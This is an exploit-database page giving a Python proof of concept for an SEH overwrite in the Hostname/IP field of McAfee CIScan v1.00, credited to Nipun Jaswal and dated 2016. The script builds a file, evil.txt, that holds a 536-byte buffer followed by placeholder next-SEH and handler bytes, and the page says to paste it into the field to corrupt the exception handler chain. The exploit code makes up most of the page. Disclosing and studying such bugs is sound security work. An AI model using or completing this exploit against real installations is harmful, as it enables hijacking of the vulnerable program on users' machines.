CIScanv1.00 Hostname/IP Field SEH Overwrite POC

2016.05.12
Credit: Nipun Jaswal
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python # Exploit Title : CIScanv1.00 Hostname/IP Field SEH Overwrite POC # Discovery by : Nipun Jaswal # Email : mail@nipunjaswal.info # Discovery Date : 11/05/2016 # Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx # Tested Version : 1.00 # Vulnerability Type: SEH Overwrite POC # Tested on OS : Windows 7 Home Basic # Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press -> ############################################ # -----------------------------------NOTES----------------------------------------------# ############################################ #SEH chain of main thread #Address SE handler #0012FA98 43434343 #42424242 *** CORRUPT ENTRY *** # Offset to the SEH Frame is 536 buffer = "A"*536 # Address of the Next SEH Frame nseh = "B"*4 # Address to the Handler Code, Generally P/P/R Address seh = "C" *4 f = open("evil.txt", "wb") f.write(buffer+nseh+seh) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top